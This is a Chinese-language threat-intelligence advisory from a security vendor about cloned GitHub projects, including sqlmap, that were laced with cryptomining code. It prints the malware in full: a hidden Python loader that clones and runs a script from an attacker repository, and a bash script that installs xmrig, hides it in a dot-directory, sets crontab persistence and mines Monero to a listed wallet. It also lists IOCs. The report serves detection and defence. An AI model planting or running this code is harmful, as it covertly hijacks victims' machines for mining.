事件概述
近日,矢安科技威胁情报中心在日常威胁狩猎过程中监测到一起利用GitHub开源软件项目托管平台传播挖矿病毒的攻击活动。
攻击者通过克隆热门开源项目,然后在项目中植入恶意挖矿脚本或代码的方式,利用受害者主机进行挖矿。
事件分析
活动初期,攻击者在GitHub上创建了多个钓鱼账号,然后克隆sqlmap等热门开源项目到仓库中,并通过新增项目文件或修改原始项目文件的方式,在项目中植入恶意挖矿脚本。
账号活跃时间主要集中在今年7月至8月:
修改原始项目文件方式植入挖矿代码
https://github.com/sqlmapprojec/PyPhisher/blob/main/PyPhisher.py
https://github.com/sqlmapprojec/SCCMSecrets/blob/main/loot/c4down.sh
恶意代码首先会判断当前设备是否存在“.1.dat”文件,如果不存在则从攻击者的另一个仓库中下载恶意脚本并执行,然后新建“.1.dat”文件防止后续重复执行该段代码。
if not os.path.exists(".1.dat"):subprocess.run(['git', 'clone', 'https://github.com/niktoproject/c.git'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)os.chdir('c')subprocess.run(['chmod', '+x', 'c.sh'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)subprocess.run(['bash', 'c.sh'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)os.chdir('..')subprocess.run(['rm', '-rf', 'c'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)with open(".1.dat", "w") as f:f.write("")subprocess.run(['rm', '-rf', 'c'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
目前脚本中出现的另外两个钓鱼账号已经被注销,无法查看具体内容:
新增项目文件方式植入挖矿脚本
https://github.com/sqlmapprojec/sqlmap/blob/main/data/c4down.sh
https://github.com/sqlmapprojec/SCCMSecrets/blob/main/loot/c4down.sh
恶意脚本主要功能是从xmrig官方库下载压缩包,解压到本地后新建计划任务,实现持久化挖矿。从脚本中可以提取出矿池地址和钱包地址。
#!/bin/bashUSUARIO=$(whoami)wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz -O /tmp/xmrig.tar.gztar -xzvf /tmp/xmrig.tar.gz -C /tmpmkdir $HOME/.xconfigcp /tmp/xmrig-6.21.3/xmrig $HOME/.xconfig/.xbilletera="45eUFaFCmq4SHeiGjfkncfVFeGTAFQtZcBY1nbXmPZdcifcBSaAi7FWA4Syf3cnVcHCx96pnXbeVsfZMu1YEuDuA6ymZr6P/"RAM=$(free -h 2>/dev/null | awk '/Mem:/ {print $2}')CPU=$(top -bn1 2>/dev/null | grep "Cpu(s)" | sed "s/.*, *([0-9.]*)%* id.*/1/" | awk '{print $1}')if [ -n "$RAM" ] && [ -n "$CPU" ]; thenNOMBRE_USUARIO="${USUARIO}_RAM${RAM}_CPU${CPU}"variable="$billetera/$NOMBRE_USUARIO"fichmod 777 $HOME/.xconfig/.x(crontab -l 2>/dev/null; echo "@reboot $HOME/.xconfig/.x -o xmr-us-east1.nanopool.org:14433 -u $billetera$USUARIO --tls --coin monero -B") | crontab -rm /tmp/xmrig.tar.gzrm -rf /tmp/xmrig-6.21.3$HOME/.xconfig/.x -o xmr-us-east1.nanopool.org:14433 -u $billetera$USUARIO --tls --coin monero -B
通过查询攻击者的钱包信息,可以发现当前共有14台设备参与挖矿,其中4台设备处于活跃状态。
思考总结
近年来,攻击者利用GitHub等开源平台传播恶意软件的手法变得愈发常见,已然成为一种日益复杂且隐蔽的攻击方式。攻击者通常将经过伪装的恶意代码植入到项目更新文件和依赖包中。由于开源社区的共享和协作等特性,以及一些热门开源项目拥有较高的信誉和知名度,使得开发者在毫无防备的情况下下载和使用被篡改的代码。从互联网下载或引用开源项目时,开发者应当关注项目的官方发布渠道,并对更新版本进行验证,避免从仿冒钓鱼网站下载代码。
IOC
矿池
xmr-us-east1.nanopool[.]org:14433
https://github.com/sqlmap-project/sqlmap/blob/main/sqlmap.py
https://github.com/sqlmapprojec/sqlmap/blob/main/data/c4down.sh
https://github.com/sqlmapprojec/PyPhisher/blob/main/PyPhisher.py
https://github.com/sqlmapprojec/SCCMSecrets/blob/main/loot/c4down.sh
45eUFaFCmq4SHeiGjfkncfVFeGTAFQtZcBY1nbXmPZdcifcBSaAi7FWA4Syf3cnVcHCx96pnXbeVsfZMu1YEuDuA6ymZr6P
更多详细信息,请关注公众号或联系我们获取。
防护建议
目前,矢安科技旗下觅影(AS EASM)外部攻击面管理系统与攻鉴(AS BAS)突破与攻击模拟系统已全面支持对本次攻击活动的发现与检测能力,客户可通过后台服务对相关资产进行薄弱点检测与风险排查。
原文始发于微信公众号(矢安科技):【警惕】sqlmap等多个Github热门项目被用于秘密挖矿
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论